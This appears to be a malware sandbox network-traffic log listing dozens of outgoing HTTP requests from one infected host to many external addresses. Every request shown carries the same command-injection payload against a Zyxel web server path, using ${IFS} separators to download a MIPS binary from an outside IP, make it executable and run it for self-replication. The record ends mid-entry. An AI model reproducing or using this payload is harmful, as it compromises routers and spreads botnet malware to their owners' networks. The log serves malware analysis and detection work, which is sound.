                                              Jan 29, 2024 07:04:09.387109995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9103192.168.2.1449882139.120.8.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387156963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9104192.168.2.1441918180.157.16.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387181997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9105192.168.2.14523045.118.196.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387217999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9106192.168.2.1456252164.149.97.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387270927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9107192.168.2.1460786100.52.5.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387315989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9108192.168.2.1449078111.65.3.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387321949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9109192.168.2.144504084.33.137.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387370110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9110192.168.2.1447760117.241.88.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387417078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9111192.168.2.144052284.39.85.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387445927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9112192.168.2.1459898142.84.32.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387482882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9113192.168.2.1443834110.28.211.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387512922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9114192.168.2.145622073.61.169.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387546062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9115192.168.2.1444950118.83.158.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387593985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9116192.168.2.1448598138.181.95.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387643099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9117192.168.2.1433078189.178.125.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387665033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9118192.168.2.1460412171.199.91.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387721062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9119192.168.2.1460766202.111.133.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387763977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9120192.168.2.1447546161.220.116.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387792110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9121192.168.2.145264646.190.184.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387840033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9122192.168.2.1441518161.48.95.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387855053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9123192.168.2.1453268189.92.161.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387913942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9124192.168.2.14589884.102.239.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387943983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9125192.168.2.1460948200.142.153.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.387968063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9126192.168.2.144964439.171.224.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388025999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9127192.168.2.1440926139.92.218.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388060093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9128192.168.2.145292252.85.242.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388087988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9129192.168.2.1453572190.59.26.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388140917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9130192.168.2.145638843.182.97.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388168097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9131192.168.2.145025061.119.3.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388195038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9132192.168.2.1433974202.36.1.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388252020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9133192.168.2.1439546132.140.249.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388283014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9134192.168.2.1439530139.112.150.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388333082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9135192.168.2.14509925.72.162.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388350010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9136192.168.2.1454766105.22.207.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388398886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9137192.168.2.144674077.140.33.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388442993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9138192.168.2.143787273.196.95.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388478041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9139192.168.2.145150484.205.245.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388509989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9140192.168.2.1437742106.120.185.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388555050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9141192.168.2.14465569.167.116.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388592005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9142192.168.2.1453558219.113.138.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388628960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9143192.168.2.1445496156.180.150.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388689995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9144192.168.2.1439326202.176.138.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388725042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9145192.168.2.1444936137.230.103.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388752937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9146192.168.2.1453152157.199.195.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388797998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9147192.168.2.1436654154.137.52.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388833046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9148192.168.2.1436956203.75.169.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388868093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9149192.168.2.1445210129.35.162.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388923883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9150192.168.2.144106639.245.36.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.388959885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9151192.168.2.1443966188.225.30.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389014959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9152192.168.2.1445224153.255.23.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389048100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9153192.168.2.144151027.223.172.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389106989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9154192.168.2.1437206136.37.222.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389163017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9155192.168.2.1456548163.164.125.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389199018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9156192.168.2.143431825.217.90.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389225006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9157192.168.2.1443836113.23.123.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389246941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9158192.168.2.1445952133.68.73.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389270067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9159192.168.2.1433692171.29.103.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389322996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9160192.168.2.1438448109.200.58.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389343977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9161192.168.2.143731067.234.223.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389386892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9162192.168.2.1456758192.160.34.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389442921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9163192.168.2.1437526213.79.80.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389471054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9164192.168.2.143434882.206.209.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389506102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9165192.168.2.1452740113.165.37.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.389574051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9166192.168.2.1434462220.88.44.69443
                                              TimestampBytes transferredDirectionData
